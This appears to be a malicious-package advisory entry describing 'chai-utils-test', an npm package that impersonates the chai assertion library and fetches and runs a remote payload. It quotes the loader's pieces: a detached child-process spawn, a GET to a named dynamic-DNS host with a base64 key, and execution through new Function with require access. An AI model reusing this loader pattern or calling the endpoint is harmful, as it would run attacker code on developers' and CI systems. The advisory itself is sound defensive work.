MAL-2026-5748

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (64edd573a9e5fdef8dcde78f5b0c9fa00521f232b886be838104741d1e0535f7) Package name 'chai-utils-test' impersonates the popular 'chai' assertion library and ships a cloned chai source tree. The declared main (index.js) calls a top-level launcher that spawns `node lib/chai/utils/assertion.js` as a detached child process with `stdio:'ignore'` and `child.unref()`, so the dropper survives the parent and produces no visible output. The child uses axios to GET https://statecheck.ddns.net/api/scanner.js (a dynamic-DNS host) with a base64-encoded `key=YWRtaW46c2VjcmV0MTIz` query parameter (likely a server-side gate for staged payload delivery), then runs the response body via `new Function('require', s)(require)` — granting the attacker-served code full Node `require()` access. The package also pre-installs a `global.atob` polyfill backed by `Buffer.from(x,'base64').toString('utf8')` in preparation for the fetched payload. Net effect: any developer or CI job that requires/imports this package executes attacker-controlled code from a mutable remote endpoint with full Node privileges.